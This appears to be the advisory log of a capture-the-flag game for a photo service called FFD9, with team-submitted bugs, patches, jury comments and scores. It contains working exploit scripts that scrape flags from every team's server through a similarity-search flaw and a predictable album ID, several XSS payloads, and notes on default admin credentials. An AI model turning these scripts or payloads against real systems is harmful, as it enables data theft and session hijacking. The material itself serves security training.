FFD9 Advisories


Service:FFD9
Text:FFD9

vuln: you can load ANY files from your FS; they can be Perl shells.
tell me please how to use it =)
solution: check the signature
Jury comment:Plz, prove this and get patch and exploit
Score:0/10 points


Service:FFD9
Text:you can find pictures similar to the flag, which are barcodes.

exploit: get one picture of a flag (barcode) and search for it. You will get several new pictures; decode them -> get flags.
Jury comment:Yes. Please get patch and code of exploit.
Score:2/5 points

Service:FFD9
Text:part of exploit:


require 'watir'      # drives the browser that uploads the probe image
require 'net/http'
require 'socket'

$myteam = 0          # set this to your own team number before running
www = Watir::Browser.new

(1..99).each do |team|
  next if team == $myteam
  begin
    www.goto "http://10.23.#{team}.3"

    # upload a known flag barcode and ask for "similar" images with a
    # negative similarity margin, so that every stored image is returned
    www.file_field(:name, "searh_image").set "D:\\1.png"
    www.text_field(:id, "magick_input").set "-30"
    www.image(:id, "find_image").click

    # collect the /photo/... paths of the returned images
    images_ar = []
    www.html.scan(/IMG alt="" src="(\/photo\/[^"]*)" width=400/m) { |path,| images_ar << path }

    otvets_ar = []   # decoded flags ("otvet" = answer)
    images_ar.each do |im|
      local = "D:\\coding\\ructfe2011\\flags\\#{im.gsub('/', '')}.png"
      Net::HTTP.start("10.23.#{team}.3") do |http|
        resp = http.get("#{im}.png")
        File.open(local, "wb") { |file| file.write(resp.body) }
      end
      # decode the barcode with ZBar; its output looks like "CODE-128:<flag>"
      n_a = `"C:\\Program Files\\ZBar\\bin\\zbarimg.exe" -d -q -D #{local}`
      otvets_ar << n_a.gsub('CODE-128:', '').strip
    end
    puts otvets_ar

    # submit everything found on this team to the checksystem
    t = TCPSocket.new('10.23.41.162', 31337)
    t.gets
    t.puts otvets_ar.join(' ')
    puts t.gets
    t.close
  rescue => e
    puts "error #{team}: #{e.message}"
  end
end
Jury comment:Cool, but the patch is not available for now
Score:2/5 points

Service:FFD9
Text:patch is to cut off similar photos from the search output. File find.html.ep
Jury comment:It breaks service functionality
Score:0/5 points

Service:FFD9
Text:patch for similar photos:

add private => 0 in the find_one function. File FFD9DB.pm, line 198
Jury comment:Ok
Score:1/5 point


Service:FFD9
Text:Album IDs are predictable from user IDs:
The game server submits flags to FFD9 as album titles. It does this by creating a new user and subsequently creating a new album. If you know the user ID (i.e. by using the URL http://10.23.?.3/users/), you only have to increment the ID by 1 in order to get a valid album ID. By using http://10.23.?.3/user/album/<aid> you can then determine the name of that album and hence capture the flag.

Resolution:
Instead of using the MongoDB ObjectID as the (secret) id of albums, generate an actual random number and use that as the key to identify albums. (Requires some coding.)

An easier resolution is to just close the http://10.23.?.3/users/ weakness. User IDs are still drawn deterministically, but that way album IDs become much harder to guess.
Jury comment:Yes, please provide patch for full points
Score:5/8 points
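
As an added example (not code from the FFD9 service or from the team that wrote the advisory above), the Python below shows why the "increment by 1" trick works and what the proposed fix looks like. It splits a 12-byte MongoDB ObjectId into its timestamp, machine, pid and counter fields, derives the ids the same process hands out next (only the 3-byte counter advances, and it wraps at 2^24, so a plain integer +1 carries into the pid field at ...ffffff), scrapes candidate user ids from a constructed /users listing, and generates a random album key as the replacement. The sample HTML, the base URL 10.23.1.3 and all function names are assumptions; the page only describes the case where user and album are created within the same second, and if they were not, the timestamp field moves too and the guess has to be widened.

```python
import re
import secrets
import struct
from datetime import datetime, timezone

# Constructed sample of a /users listing (not captured from a game VM).
SAMPLE_USERS_HTML = """
<ul id="users">
  <li><a href="/user/4ec7c9283a1171b201000003">chnmvwvfzvjr</a></li>
  <li><a href="/user/4ec7c9283a1171b201ffffff">zzzzzzzzzzzz</a></li>
</ul>
"""

USER_LINK_RE = re.compile(r'href="/user/([0-9a-f]{24})"')


def parse_object_id(hex_id):
    """Split a 12-byte MongoDB ObjectId (24 hex chars) into its fields."""
    raw = bytes.fromhex(hex_id)
    if len(raw) != 12:
        raise ValueError("ObjectId must be 12 bytes")
    timestamp = struct.unpack(">I", raw[0:4])[0]      # seconds since epoch
    machine = raw[4:7].hex()                          # machine identifier
    pid = struct.unpack(">H", raw[7:9])[0]            # process id
    counter = int.from_bytes(raw[9:12], "big")        # per-process counter
    return {"timestamp": timestamp, "machine": machine, "pid": pid, "counter": counter}


def naive_next_id(hex_id):
    """What the exploits on this page do: treat the id as one big integer."""
    return "%024x" % (int(hex_id, 16) + 1)


def next_object_ids(hex_id, n=1):
    """The ids the same process allocates next within the same second.

    Only the 3-byte counter moves, modulo 2**24; naive_next_id() is wrong
    for an id ending in ffffff because the carry lands in the pid field.
    """
    fields = parse_object_id(hex_id)
    prefix = bytes.fromhex(hex_id)[:9]          # timestamp + machine + pid
    return [
        (prefix + ((fields["counter"] + k) % (1 << 24)).to_bytes(3, "big")).hex()
        for k in range(1, n + 1)
    ]


def candidate_album_urls(base_url, users_html, per_user=1):
    """Turn a /users page into the album URLs worth trying."""
    urls = []
    for uid in USER_LINK_RE.findall(users_html):
        for aid in next_object_ids(uid, per_user):
            urls.append(f"{base_url}/user/album/{aid}")
    return urls


def object_id_time(hex_id):
    """When the id was minted; useful for picking the freshest users."""
    return datetime.fromtimestamp(parse_object_id(hex_id)["timestamp"], timezone.utc)


def new_album_key():
    """Fix: 128 random bits from the OS CSPRNG, unrelated to any user id."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    for url in candidate_album_urls("http://10.23.1.3", SAMPLE_USERS_HTML):
        print(url)
    print(object_id_time("4ec7c9283a1171b201000003"))
    print("random album key:", new_album_key())
```

The random key has to be the only way to reach an album; keeping the ObjectId in the URL next to it would bring the predictability back.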

Service:FFD9
Text:
------------------------------ [[ FluxFingers ]] ------------------------------
--[ Description ]--------------------------------------------------------------
It is possible to read the flags from the album.

--[ Patch ]--------------------------------------------------------------------
/public/js/index.js
Line: 61

Change:
$(s).appendTo('#users');
to
$(z).appendTo('#users');

--[ Exploit ]------------------------------------------------------------------
1. Get the User Id, which is in the link on your index (like <a href="/user/4ec7c9283a1171b201000003">chnmvwvfzvjr</a>)
the user id is 4ec7c9283a1171b201000003
2. Increment this to 4ec7c9283a1171b201000004
3. Call http://$ip/user/album/4ec7c9283a1171b201000004
4. Get the flag :) (its like: Name: FHT0S596XY2P438GUYOH7TDZDKF6PRX=)
Jury comment:Yes, but the exploit was already posted. And this patch doesn't work in all cases. (http://ip/users)
Score:1/8 point

Service:FFD9
Text:Exploit for getting flags from non-patched service


#!/usr/bin/env python3
# Usage: python3 exploit.py http://10.23.XX.3
import re
import sys
import urllib.error
import urllib.request

regexp = re.compile(r"\w{24}")    # 24 hex chars: a MongoDB ObjectId
flag = re.compile(r"\w{31}=")     # flag format, e.g. FHT0S596XY2P438GUYOH7TDZDKF6PRX=

base = sys.argv[1]
with urllib.request.urlopen(base + "/users", timeout=20) as d:
    s = d.read().decode("utf-8", "replace")
uids = regexp.findall(s)

# only the newest users matter: the checksystem creates a user, then its album
for uid in uids[-20:]:
    # the album's ObjectId was allocated right after the user's one
    aid = int(uid, 16) + 1
    try:
        with urllib.request.urlopen(base + "/user/album/%024x" % aid, timeout=5) as al:
            for f in flag.findall(al.read().decode("utf-8", "replace")):
                print(f)
    except (urllib.error.HTTPError, urllib.error.URLError):
        pass
Jury comment:Already posted by other team
Score:0/8 points


Service:FFD9
Text:You can see all users id by going to url http://10.23.x.y/users
Jury comment:Ok
Score:1/1 point


Service:FFD9
Text:login to system with credentials admin : admin - get access to site
Jury comment:It is a test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:You can log in as admin with username 'admin' pass 'admin' after service starts
Jury comment:It is a test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:db collection has 'admin':'admin' entry
Jury comment:It is a test user. Not a bug.
Score:0/1 points

Service:FFD9
Text:FFD9, which runs on Port 80 of the VulnBox, has a default username / password pair of admin:admin

To fix:

Connect to the database for ffd9:
mongo ffd0

Generate a new password (the service stores MD5 hashes):
echo -n "F00" | md5sum

Change the admin password:
db.users.update({name:"admin"}, {$set:{pass: "MD5SUM"}})




Jury comment:It is not a bug. It is a test user.
Score:0/1 points

Service:FFD9
Text:default pass for admin is admin
Jury comment:Yes. It is not a bug. It is a test user.
Score:0/1 points


Service:FFD9
Text:using 10.23.%teamAddr%.%battlePort%/users you can get the users; there are user IDs. Using a user ID you can connect as http://10.23.48.133/user/%userId%

close it with .htaccess
Jury comment:plz, prove it
Score:0/5 points


Service:FFD9
Text:It's possible to extract all currently stored flags (decoded barcodes from uploaded images) by using the find feature.
Since the value of the magick_input field is not properly sanitized, one can provide arbitrarily large values (>30).
Due to this, all images are considered similar to the one uploaded (see the JavaScript code in FFD9DB.pm [search function]).

This can easily be prevented by sanitizing the supplied value:
var m = <%= $m %>;
if (m > 30) {
    m = 30
}
var n = <%= $n %> + m;
...
Jury comment:This does not fix the vuln. Also not an exploit.
Score:2/10 points


Service:FFD9
Text:"data.widht" - typo in file index.js, line 73
Jury comment:Yes ;). But it is not security bug.
Score:0/1 points


Service:FFD9
Text:You can upload any file via admin upload. Parses only extension
Jury comment:No. You cannot upload any file. Please prove it.
Score:0/1 points

Service:FFD9
Text:You can upload any file with an "image" extension, for example "JPG", via upload. The destination can be found by looking at the page source.
Jury comment:Yes, but it is not a security bug
Score:0/1 points

Service:FFD9
Text:patching the possibility of including files:
my ($x, $y, $z) = unpack("CCC", $String);   # first three bytes of the upload
my $c = chr $x;
$c .= chr $y;
$c .= chr $z;

# JPEG files start with the SOI marker FF D8 FF; the original wrote it as
# "яШя", which is how those three bytes look in the Windows-1251 code page
if ( $c ne "\xFF\xD8\xFF" ) {
    #go home
}
for JPG files or something like this
Jury comment:It's checked in another place
Score:0/1 points


Service:FFD9
Text:===== Team: My Little Pwnies ======================================
=== Number: 82 ====================================================
===== Time: 11/19/2011 @ 16:10 UTC =================================

-------------------------------------------------------------------
--- 1. Summary: ---------------------------------------------------
-------------------------------------------------------------------

The FFD9 service has XSS in the Album Name field after the user logs in.


-------------------------------------------------------------------
--- 2. Description: -----------------------------------------------
-------------------------------------------------------------------

When entering an album name, malicious script can be entered to create reflected XSS in the album name.
Upon refreshing the page this is displayed with filtered characters.

-------------------------------------------------------------------
--- 3. Impact: ----------------------------------------------------
-------------------------------------------------------------------

Potentially allow an attacker to insert malicious page into a user's page thereby controlling their session thereafter or stealing cookies.

-------------------------------------------------------------------
--- 4. Affected Services: -----------------------------------------
-------------------------------------------------------------------

FFD9 Album name

-------------------------------------------------------------------
--- 5. Solution: --------------------------------------------------
-------------------------------------------------------------------

Filter characters such as [<>/&%();'"] and script tags.

-------------------------------------------------------------------
--- 6. Time Table: ------------------------------------------------
-------------------------------------------------------------------

11/19/2011 - 11:10am submitted
Jury comment:This only works for you and works only while creating a new album. Scripts are not executed when displaying the list of albums.
Score:0/1 points

Service:FFD9
Text:album name is XSS vulnerable, put
<a href="#" onclick="now();function now() {for (i=1;i>0;i++){open('DieScript.htm','new'+i);}}">myname</a>
and get saaaad..
solution: use standard escape functions
Jury comment:This only works for you and works only while creating a new album. Scripts are not executed when displaying the list of albums.
Score:0/1 points


Service:FFD9
Text:
Service: FFD9

Vulnerability: XSS
You can register new users and inject code over the username.

Exploit:
Register a user named "<iframe>". In the userlist the name is printed directly and an iframe appears.

Fix:
Use the Perl module HTML::Entities to fix this problem.

HTML::Entities::encode($text);
Jury comment:Ok
Score:2/2 points
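
Added example, not code from the FFD9 service or from any team on this page: the Python below contrasts the two fixes proposed for the XSS advisories, the character blacklist from the My Little Pwnies advisory (strip [<>/&%();'"] and "script") and output encoding as HTML::Entities::encode does it in Perl (html.escape here). It renders the three payloads quoted on this page inside a list item, checks that the encoded version contains no tag other than the wrapper while still displaying the name verbatim, and shows what the blacklist does to legitimate data. The <li> wrapper, the function names and the sample names are assumptions.

```python
import html
import re
from urllib.parse import unquote

# Payloads quoted in the advisories on this page; the third one is posted
# URL-encoded through the login form, so it is decoded the way the server would.
PAYLOADS = [
    "<iframe>",
    """<a href="#" onclick="now();function now() {for (i=1;i>0;i++){open('DieScript.htm','new'+i);}}">myname</a>""",
    unquote("asd6<img%20src%3da%20onmouseover%3dalert(1)>f8baa65cb68"),
]

# The blacklist proposed in one advisory: drop [<>/&%();'"] and the word "script".
BLACKLIST_RE = re.compile(r"""[<>/&%();'"]|script""", re.IGNORECASE)

# Any tag in the rendered fragment other than our own <li> ... </li> wrapper.
FOREIGN_TAG_RE = re.compile(r"<(?!/?li>)[a-zA-Z/]")


def render_filtered(name):
    """Filtering approach: characters are silently deleted from the data."""
    return "<li>" + BLACKLIST_RE.sub("", name) + "</li>"


def render_encoded(name):
    """Output-encoding approach (what HTML::Entities::encode does in Perl):
    nothing is deleted, the browser just cannot read any of it as markup."""
    return "<li>" + html.escape(name, quote=True) + "</li>"


def has_foreign_tag(rendered):
    """True if the fragment contains a tag the template did not put there."""
    return FOREIGN_TAG_RE.search(rendered) is not None


def displayed_text(rendered):
    """What the user sees once the browser decodes the entities."""
    return html.unescape(rendered[len("<li>"):-len("</li>")])


if __name__ == "__main__":
    for p in PAYLOADS:
        print(render_encoded(p))
    # constructed legitimate usernames that the blacklist damages
    for name in ["O'Brien & Co. (R/D)", "description"]:
        print(repr(name), "->", render_filtered(name), "vs", render_encoded(name))
```

Encoding is done at output time, in the template that prints the name, so the stored value stays intact and the same value can later be emitted safely into other contexts with the matching encoder.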

Service:FFD9
Text:ATTENTION: This advisory is similar to the old one but another form is vulnerable


Service: FFD9

Vulnerability: XSS
You can register new users and inject code over the username.

Exploit:
Create an album named "<iframe>". In the albumlist the name is printed directly and an iframe appears.

Fix:
Use the Perl module HTML::Entities to fix this problem.

HTML::Entities::encode($text);
Jury comment:Repeat.
Score:0/2 points

Service:FFD9
Text:Cross site scripting vulnerability in username entry
Jury comment:Already post
Score:0/2 points

Service:FFD9
Text:1) Description of Vulnerability

XSS

======================================================================
2) Exploit / PoC

Use:

asd6<img%20src%3da%20onmouseover%3dalert(1)>f8baa65cb68

for

http://10.23.XX.3/ - login function

======================================================================
3) Patch

avoid the usage of html encoding

======================================================================
Jury comment:Already posted
Score:0/2 points

Service:FFD9
Text:XSS when registering a user can delete all content on the page, bringing the service down
Jury comment:Already posted.
Score:0/2 points